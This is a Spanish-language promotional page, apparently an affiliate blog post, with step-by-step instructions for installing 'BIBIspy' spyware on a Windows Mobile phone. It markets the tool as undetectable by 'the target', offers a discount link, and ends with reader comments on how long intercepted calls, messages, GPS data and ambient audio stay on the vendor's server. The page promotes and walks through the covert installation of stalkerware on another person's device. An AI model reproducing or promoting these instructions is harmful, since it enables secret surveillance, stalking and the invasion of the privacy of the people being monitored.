¿Usuarios de teléfonos con Windows Mobile? ¡Aquí sabrán cómo instalar BIBIspy !

OS Windows Mobile

El proceso de instalación es simple y solo toma unos minutos ; después de leer esta guía sabrá detalladamente cómo obtener la información que desee de un teléfono con Windows Mobile.

  1. Si usted ya es cliente de BIBIspy, después de instalar el software, vaya aquí y obtenga información sobre el monitoreo del teléfono. Necesitará su nombre de usuario y contraseña que creó cuando abrió una cuenta con BIBIspy.
  2. Si no ha creado aun una cuenta de BIBIspy, vaya aquí para obtener una.

BIBIspy es el software espía para Windows Mobile totalmente imposible de rastrear e indetectable por el objetivo. La información deseada es tan importante para usted, que todas las circunstancias imaginables han sido simuladas por BIBIspy para asegurarnos de ofrecerle una herramienta totalmente eficiente y discreta.

Instalación

NB : No necesita conectar el teléfono a una computadora para instalar BIBIspy.

1/ Abra el Internet Explorer en el teléfono

2/ Haga clic en la casilla « Open file after download » y luego haga clic en « Yes ».

3/ Si la siguiente ventana aparece, haga clic en « Yes » de nuevo. Una barra de progreso mostrará el avance de la instalación.

4/ Cuando aparezca la pantalla de « Terms of Use », acepte.

5/ Finalmente, seleccione la casilla de “Accept terms and Conditions“, introduzca su número de licencia y haga clic en ” Submit “.

Ahora usted está listo para utilizar las funciones de BIBIspy. Llame al teléfono y envíe unos cuantos mensajes de texto, conexiones comenzarán a aparecer en su cuenta en línea en cuestión de minutos. Para verificar que sus llamadas y mensajes se guarden, conéctese con el Software desde cualquier computadora con acceso a internet.

==> Descargar BIBIspy <==

NOTA :

Guía de instalación para Android

Tre Fleccia

flagrante-delito

Bibispy es la aplicación de monitoreo más efectiva.

A través de este enlace promocional, obtendrá un 22% de descuento.

Pruébelo!

{ 2 comentarios… add one }
  • Timotea León febrero 8, 2014, 3:26 am

    Hola,
    Quería saber después de cuánto tiempo se elimina la información del audio del entorno y de las llamadas ? afortunadamente no las descargué (porque cuando compré spybubble no siempre tenía acceso a una computadora).
    Gracias por sus respuestas.

    Respuesta
    • Cain Ortega febrero 17, 2014, 6:49 am

      Hola,
      La información del teléfono (mensajes, gps, llamadas entrantes y salientes, etc) se elimina del servidor después de 7 días. Hay una opción que te permite grabarla en tu disco duro.

      Respuesta

Deja un comentario

Next Post:

Previous Post:

Pin It on Pinterest

Share This